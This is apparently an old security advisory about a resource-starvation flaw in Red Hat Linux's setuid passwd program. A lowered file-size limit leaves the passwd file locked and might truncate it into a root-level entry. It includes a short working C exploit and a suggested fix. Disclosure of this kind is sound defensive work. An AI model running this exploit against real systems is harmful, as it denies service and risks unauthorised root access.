COMMAND

    passwd

SYSTEMS AFFECTED

    RedHat Linux (at least)

PROBLEM

    Antonomasia  found  following.    This  demonstrates  a   resource
    starvation attack on  the setuid root  passwd(1) program.   In the
    case he  tested it  was the  Red Hat  Linux passwd-0.50-7  program
    without shadowing.

    The resource being restricted is filesize, and if the passwd  file
    is large enough it cannot  be written back and the  passwd program
    dies.  This leaves the passwd file locked against further password
    changes - a denial of  service attack.  Antonomasia was  unable to
    write back an incomplete passwd file during his tests, but you can
    imagine some systems  allowing this, in  which case you  could aim
    for an incomplete last line like this:

        myname:my-epw:

    which could be awkward if any authentication programs interpret it
    as:

        myname:my-epw:0:0::/:/bin/sh

    Exploit follows:

        #include <stdio.h>
        #include <sys/time.h>
        #include <stdlib.h>
        #include <unistd.h>
        #include <sys/resource.h>
        main ()
        {
            struct  rlimit rl, *rlp;
            rlp=&rl;
            rlp->rlim_cur=4000 ;
            rlp->rlim_max=4000 ;
            setrlimit(RLIMIT_FSIZE, rlp);
            execl("/usr/bin/passwd", "passwd", (char *) 0);
        }

SOLUTION

    A suggested fix is for the passwd program to be aware of the  size
    of the file before writing,  and to quit if failure  is predicted.
    There are obviously other resources that could be restricted,  and
    there may  be a  case for  increasing limits  on cpu  time or file
    descriptors, or even filesize to ensure successful completion.